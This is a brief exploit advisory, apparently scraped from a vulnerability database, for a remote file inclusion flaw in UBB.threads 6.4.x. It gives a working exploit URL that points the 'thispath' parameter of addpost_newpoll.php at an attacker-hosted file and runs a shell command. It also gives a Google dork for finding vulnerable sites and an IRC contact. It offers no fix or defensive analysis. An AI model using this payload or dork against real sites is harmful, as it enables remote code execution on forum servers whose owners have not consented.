Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12779
HistoryMay 23, 2006 - 12:00 a.m.

UBB.threads >= 6.4.x Remote File Inclusion

2006-05-2300:00:00
vulners.com
269

Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion

founded by V4mu in 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id

contact: irc.gigachat.net #A1TS

milw0rm.com [2006-05-22]